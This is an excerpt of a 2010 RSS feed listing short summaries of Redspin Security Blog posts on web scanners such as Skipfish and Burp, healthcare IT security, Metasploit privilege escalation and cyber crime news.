<item><title>Keeping Current with Skipfish</title><description>Secuobs.com : 2010-04-07 22:35:43 - Redspin Security Blog - This post discusses a tool to automatically check and keep a local copy of skipfish up-to-date </description><link>http://www.secuobs.com/revue/news/209894.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/209894.shtml</guid></item>
<item><title>Healthcare IT   Key Security Areas to Get Right</title><description>Secuobs.com : 2010-04-07 01:11:00 - Redspin Security Blog - According to the datalossDBorg, over 110 healthcare organizations have reported the loss of sensitive PHI and or PII data affecting 5,306,000 people since January 1998 Over 40 percent of the losses were related to theft of laptops, tapes or other media Another 27 percent were the result of loss or negligence by staff or    </description><link>http://www.secuobs.com/revue/news/209509.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/209509.shtml</guid></item>
<item><title>Burp Suite Professional to XML  BURP2XML</title><description>Secuobs.com : 2010-03-24 22:28:43 - Redspin Security Blog - Burp Suite Professional's session file is not in a useful format to extract data from This post introduces a python script that converts this session file to a XML document </description><link>http://www.secuobs.com/revue/news/205111.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/205111.shtml</guid></item>
<item><title>HIE s   Now that the funding is complete, what will the operational environment look like </title><description>Secuobs.com : 2010-03-23 00:52:15 - Redspin Security Blog - Last week the Department of Health and Human Services  HHS  announced an additional round of  162M in funding for Healthcare Information Exchanges Combined with the state grants announced in February, this brings total funding to  547M This means that all the states and state designated entities are on a path towards implementing the    </description><link>http://www.secuobs.com/revue/news/204214.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/204214.shtml</guid></item>
<item><title>Skipfish, Google Enters the Web Scanner Fray</title><description>Secuobs.com : 2010-03-19 23:47:27 - Redspin Security Blog - This morning the office was buzzing with Google hysteria Google, releasing great tools like RATproxy, has released a web application scanner similar to Nikto  and to a lesser extent Nessus web Checks  Now, we understand that not everyone is a Goog-Fanboy, but we love testing new apps We wrote a cursory install for a testbed machine    </description><link>http://www.secuobs.com/revue/news/203551.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/203551.shtml</guid></item>
<item><title>Installing Google Skipfish on Ubuntu Debian</title><description>Secuobs.com : 2010-03-19 22:42:40 - Redspin Security Blog - here s the simple commands necessary to get hacking with Google s new web application scanner Skipfish  wget http skipfishgooglecodecom files skipfish-100btgz tar zxvf skipfish-100btgz sudo apt-get install libidn11-dev cd skipfish make cp dictionaries defaultwl skipfishwl  skipfish -o output_folder http wwwexamplecom you ll want to less README to understand all the options more to come shortly with our opinions, tips and lab results currently we re getting 600  requests second for internet sites, 4000     </description><link>http://www.secuobs.com/revue/news/203524.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/203524.shtml</guid></item>
<item><title>Healthcare IT Security Developments</title><description>Secuobs.com : 2010-03-17 20:36:20 - Redspin Security Blog - Earlier this week the Office of the National Coordinator for Health Information Technology  ONC  released an initial draft of its healthcare IT framework and strategic plan This is a high level outline of the themes, principles, strategies and objectives that the ONC will address and reflects an update to the Federal Health IT Strategic    </description><link>http://www.secuobs.com/revue/news/202707.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/202707.shtml</guid></item>
<item><title>Threats, Lies and Videotape   a few days at the RSA Conference</title><description>Secuobs.com : 2010-03-04 17:07:55 - Redspin Security Blog - I spent the last few days at the RSA conference in San Francisco I ve been attending for many years now and there seems to be a growing discontinuity between what s being presented in the sessions  and the discussions following  and the stories pitched on the expo floor One theme that echoed throughout many vendor booths    </description><link>http://www.secuobs.com/revue/news/198045.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/198045.shtml</guid></item>
<item><title>FTC slams ControlScan</title><description>Secuobs.com : 2010-03-04 02:17:29 - Redspin Security Blog - I wrote about this a while back, but it seems like others are taking note. The US Federal Trade Commission (FTC) on Thursday (Feb 25) screamed "the Emperor has no clothes" by reporting to consumers that one of the largest firms issuing "Verified Secure Breach Protection" seals doesn't really verify much at all. The practical impact</description><link>http://www.secuobs.com/revue/news/197850.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/197850.shtml</guid></item>
<item><title>Identity Theft Check Up: Electronic Medical Records are the New Credit Cards</title><description>Secuobs.com : 2010-03-03 23:48:49 - Redspin Security Blog - As credit card fraud prevention measures have made it tougher on identity thieves, identity thieves have found a new target: healthcare identities. And healthcare information systems are nowhere near ready to withstand the onslaught. A recent survey by Chicago-based HIMSS (Healthcare Information and Management Systems Society) found that most hospitals spend less than 3% of</description><link>http://www.secuobs.com/revue/news/197783.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/197783.shtml</guid></item>
<item><title>Force multipliers for application security</title><description>Secuobs.com : 2010-02-26 01:56:29 - Redspin Security Blog - Over the last several years many analysts, including Gartner, have identified application security as the area presenting the most significant risk to companies with internet-facing applications. As a result a number of best practices have emerged, ranging from secure coding practices and developer training from organizations such as Microsoft to change management driven</description><link>http://www.secuobs.com/revue/news/195768.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/195768.shtml</guid></item>
<item><title>Would you believe it? Twitter as a way of coping with infosec information overload</title><description>Secuobs.com : 2010-02-22 01:33:32 - Redspin Security Blog - The job of keeping up with the latest threats and vulnerabilities is a daunting task for security professionals. There are many excellent resources for both threats (for example, Symantec DeepSight data feeds) and vulnerabilities (DHS National Cyber Security Division US-CERT). But it still requires skilled human effort to synthesize which assets in an organization</description><link>http://www.secuobs.com/revue/news/193984.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/193984.shtml</guid></item>
<item><title>Healthcare sector investments in information security just make good business sense</title><description>Secuobs.com : 2010-02-19 20:20:47 - Redspin Security Blog - While companies in the healthcare sector focus on HITECH Act compliance and meaningful use, and healthcare reform dominates the headlines, it is worthwhile to consider some of the business reasons for investing in a strong information security program. Modernization of the healthcare payments system is one big area where the potential for cost savings</description><link>http://www.secuobs.com/revue/news/193636.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/193636.shtml</guid></item>
<item><title>Web App Trends and Predictions from Breach</title><description>Secuobs.com : 2010-02-19 20:20:47 - Redspin Security Blog - Here is an interesting recap of some of the top web incidents of 2009, along with some projections for 2010. It's done by one of the guys at Breach Security. It includes a recap and some technical details on the TJX hack, Time's "Most Influential Person" poll abuse, fun with Twitter, and more. A good</description><link>http://www.secuobs.com/revue/news/193635.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/193635.shtml</guid></item>
<item><title>Getsystem, Privilege Escalation via Metasploit</title><description>Secuobs.com : 2010-02-19 03:55:04 - Redspin Security Blog - A few weeks ago Chris Gates (a.k.a. Attack Research / Carnal Ownage) and Joshua Gauthier showed some quick snippets of Metasploit's Getsystem extension. Getsystem is meterpreter's new (Windows) privilege escalation extension used in the priv module. Getsystem uses several techniques for priv escalation: Windows Impersonation Tokens (fixed by MS09-012), Abusing LSASS via token passing, Pass-the-Hash (which requires Administrator anyway)</description><link>http://www.secuobs.com/revue/news/193382.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/193382.shtml</guid></item>
<item><title>More cyber criminal activity</title><description>Secuobs.com : 2010-02-18 21:51:39 - Redspin Security Blog - This morning the Washington Post once again reported a widespread and ongoing set of attacks sponsored by a cybercriminal organization based in Eastern Europe. Amit Yoran of Netwitness was quoted as saying, "The traditional security approaches of intrusion-detection systems and anti-virus software are by definition inadequate for these types of sophisticated threats," Yoran</description><link>http://www.secuobs.com/revue/news/193305.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/193305.shtml</guid></item>
<item><title>Nsploit: Nmap grows some teeth</title><description>Secuobs.com : 2010-02-12 22:35:28 - Redspin Security Blog - Ryan Linn has started a project to bridge Nmap scans all the way to exploitation using Metasploit. Similar to the db_autopwn via fasttrack script (available in Backtrack 4), Nsploit does even more granular service-level Nmap scanning to identify versions and exploits, then passes these to Metasploit and launches the pain at your target box. It</description><link>http://www.secuobs.com/revue/news/191501.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/191501.shtml</guid></item>
<item><title>IT Risk Management</title><description>Secuobs.com : 2010-02-11 17:49:13 - Redspin Security Blog - In my last few posts I mentioned using risk management as an effective mechanism for combating cyber crime. A number of readers from the LinkedIn Information Security Group asked about recommendations for improving their risk management processes: In my corporation risk management is mostly controlled by finance. We can't seem to get a discussion</description><link>http://www.secuobs.com/revue/news/190955.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/190955.shtml</guid></item>
<item><title>Advanced persistent threats: how organizations keep pace with the growing sophistication of cyber crime</title><description>Secuobs.com : 2010-02-05 17:22:37 - Redspin Security Blog - Threats posed by cyber crime have increased dramatically in the past year. Yesterday the Washington Post announced that Google has enlisted the help of the NSA to combat cyber crime attacks directed at them and other US corporations. While this is sure to generate privacy concerns in the user community, it is more</description><link>http://www.secuobs.com/revue/news/189001.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/189001.shtml</guid></item>
<item><title>OWASP Live CD</title><description>Secuobs.com : 2010-02-04 19:50:25 - Redspin Security Blog - I need to express my love for OWASP's Live CD (aka OWASP Web Testing Environment). Its backtrack-like philosophy of piling in the web-security tools is simple, but the end result is a wonderful testing environment. From Firefox action-packed with addons, to the run of standard proxies (burp, paros, rat), a multitude of scanners (grendel, w3af), and</description><link>http://www.secuobs.com/revue/news/188660.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/188660.shtml</guid></item>
<item><title>Dealing with cyber crime</title><description>Secuobs.com : 2010-02-04 08:04:25 - Redspin Security Blog - CSO magazine recently released the 2010 Cyber Security Watch survey of over 500 respondents from both the public and private sector. In reading through the answers I was not surprised to find several results that set off a cause for alarm. Of course it's always difficult to draw conclusions from survey results and</description><link>http://www.secuobs.com/revue/news/188456.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/188456.shtml</guid></item>
<item><title>Data Security Considerations</title><description>Secuobs.com : 2010-01-22 07:22:18 - Redspin Security Blog - Earlier this month Google discussed the nature of the cyber attacks they have been facing from China. The targets included not only politically motivated email accounts, but also attacks on the corporate infrastructure that resulted in theft of intellectual property. During their investigations, Google also found evidence of ongoing attacks on major US</description><link>http://www.secuobs.com/revue/news/184336.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/184336.shtml</guid></item>
</channel>
</rss>